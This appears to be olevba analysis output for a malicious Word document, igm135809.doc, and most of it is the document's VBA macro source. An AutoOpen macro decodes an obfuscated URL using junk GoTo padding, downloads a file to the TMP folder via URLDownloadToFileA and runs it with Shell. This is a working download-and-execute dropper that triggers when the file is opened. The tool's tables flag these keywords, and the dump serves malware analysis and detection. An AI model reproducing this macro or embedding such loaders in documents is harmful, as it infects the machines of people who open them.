Malicious Word macro

1. Flags       Filename                                                        
2. ----------- -----------------------------------------------------------------
3. OLE:MAS---- igm135809.doc
4.  
5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
6.  
7. ===============================================================================
8. FILE: igm135809.doc
9. Type: OLE
10. -------------------------------------------------------------------------------
11. VBA MACRO ThisDocument.cls
12. in file: igm135809.doc - OLE stream: u'Macros/VBA/ThisDocument'
13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
14. Sub autoopen()
15. jQ5
16. End Sub
17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
18. ANALYSIS:
19. +----------+----------+---------------------------------------+
20. | Type     | Keyword  | Description                           |
21. +----------+----------+---------------------------------------+
22. | AutoExec | AutoOpen | Runs when the Word document is opened |
23. +----------+----------+---------------------------------------+
24. -------------------------------------------------------------------------------
25. VBA MACRO Module1.bas
26. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module1'
27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
28.  
29. Public Function ZBGUQzMmnNQjLfJi(MMzzbkwYsQ As String) As String
30. GoTo QmoxUCfvciBJyeaaZe
31. QmoxUCfvciBJyeaaZe:
32. GoTo OtTFVZcTsVAkgUp
33. OtTFVZcTsVAkgUp:
34. GoTo kuddPCeAMbIaLPqebUnk
35. kuddPCeAMbIaLPqebUnk:
36. GoTo BHDPSh
37. BHDPSh:
38. For NZNKEQTrblrn = 1 To Len(MMzzbkwYsQ) Step 2
39. GoTo YSwLeyRLBhqqpufYf
40. YSwLeyRLBhqqpufYf:
41. GoTo VmpskIYQAjlFinAKgthS
42. VmpskIYQAjlFinAKgthS:
43. GoTo PrZqcgGgsmEBYtRKGR
44. PrZqcgGgsmEBYtRKGR:
45. GoTo TGQojMOuOUcR
46. TGQojMOuOUcR:
47. GoTo HFKiovanmCFIAao
48. HFKiovanmCFIAao:
49. ZBGUQzMmnNQjLfJi = ZBGUQzMmnNQjLfJi & Mid(MMzzbkwYsQ, NZNKEQTrblrn, 1)
50. GoTo BVyDQNwJjjKS
51. BVyDQNwJjjKS:
52. GoTo cGfwQxICUDbKUbQ
53. cGfwQxICUDbKUbQ:
54. GoTo OVYhEzdfLRlti
55. OVYhEzdfLRlti:
56. GoTo JIMyELdDCSILDcFk
57. JIMyELdDCSILDcFk:
58. GoTo EZOFTeMMzzbkwYsQvN
59. EZOFTeMMzzbkwYsQvN:
60. GoTo KEQTrblrnzPQmoxUC
61. KEQTrblrnzPQmoxUC:
62. Next
63. GoTo iBJye
64. iBJye:
65. GoTo ZeOHO
66. ZeOHO:
67. GoTo FVZcTsVAkgUpgVkuddP
68. FVZcTsVAkgUpgVkuddP:
69. End Function
70.  
71. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
72. ANALYSIS:
73. No suspicious keyword or IOC found.
74. -------------------------------------------------------------------------------
75. VBA MACRO Class1.cls
76. in file: igm135809.doc - OLE stream: u'Macros/VBA/Class1'
77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
78. (empty macro)
79. -------------------------------------------------------------------------------
80. VBA MACRO dfsdfsdf.bas
81. in file: igm135809.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
83. #If VBA7 Then
84.     Private Declare PtrSafe Function GHJbkjJKG Lib "urlmon" Alias _
85.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
86.     ByVal gfhgfhF As String, _
87.     ByVal hjkhgFF As String, _
88.     ByVal gfhfghF As Long, _
89.     ByVal gfdgdf As LongPtr) As LongPtr
90. #Else
91.     Private Declare Function GHJbkjJKG Lib "urlmon" Alias _
92.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
93.     ByVal gfhgfhF As String, _
94.     ByVal hjkhgFF As String, _
95.     ByVal gfhfghF As Long, _
96.     ByVal gfdgdf As Long) As Long
97. #End If
98. Public Function ZXVDwjtQQrzvB71() As Integer
99. Dim wFLdECQJIjCco17, aclHuKhrZdvFz71, ZGHsTHAroMpPX33, fjJHrRdaoktmZ65 As String
100. Dim fcBkLtHUPAViT23, mWaFlcfvpbGqs65, xjTEqCqYYumMA98, jHsPLZznaTPjl82 As Integer
101. fcBkLtHUPAViT23 = 6394
102. wFLdECQJIjCco17 = R
103. mWaFlcfvpbGqs65 = Asc(wFLdECQJIjCco17)
104. If fcBkLtHUPAViT23 > mWaFlcfvpbGqs65 Then
105.     For xjTEqCqYYumMA98 = 1 To 54
106.        jHsPLZznaTPjl82 = mWaFlcfvpbGqs65 + xjTEqCqYYumMA98
107.     Next xjTEqCqYYumMA98
108. jHsPLZznaTPjl82 = jHsPLZznaTPjl82 + fcBkLtHUPAViT23
109. aclHuKhrZdvFz71 = CStr(jHsPLZznaTPjl82)
110. ZGHsTHAroMpPX33 = Mid$(aclHuKhrZdvFz71, 1, 4)
111. fjJHrRdaoktmZ65 = fjJHrRdaoktmZ65 & "25"
112. ZXVDwjtQQrzvB71 = CInt(Mid$(fjJHrRdaoktmZ65, 2, 6))
113. Else
114. ZXVDwjtQQrzvB71 = 54 + 6394
115. MsgBox ("dvuZGYOgDjMWl95")
116. End Function
117.  
118.  
119. Sub jQ5()
120. mog4O4d49 ZBGUQzMmnNQjLfJi("hot}t€p.:\/R/'x*oimum6aF.1nneetf/cjlsP/]bki&nZ.Xewxdei"), Environ(ZBGUQzMmnNQjLfJi("T)M\P[")) & ZBGUQzMmnNQjLfJi("\zGfVlh\j(J_J7V3JtH^.…esxae|")
121. End Sub
122. Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
123. vJHKBJdfkgfg = GHJbkjJKG(0&, Mh9_094suu, R4_t, 0&, 0&)
124. Dim j_W8
125. j_W8 = Shell(R4_t, 1)
126. End Function
127.  
128.  
129.  
130. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
131. ANALYSIS:
132. +------------+--------------------+-----------------------------------------+
133. | Type       | Keyword            | Description                             |
134. +------------+--------------------+-----------------------------------------+
135. | Suspicious | Lib                | May run code from a DLL                 |
136. | Suspicious | Shell              | May run an executable file or a system  |
137. |            |                    | command                                 |
138. | Suspicious | Environ            | May read system environment variables   |
139. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
140. +------------+--------------------+-----------------------------------------+
141. -------------------------------------------------------------------------------
142. VBA MACRO Module2.bas
143. in file: igm135809.doc - OLE stream: u'Macros/VBA/Module2'
144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
145. (empty macro)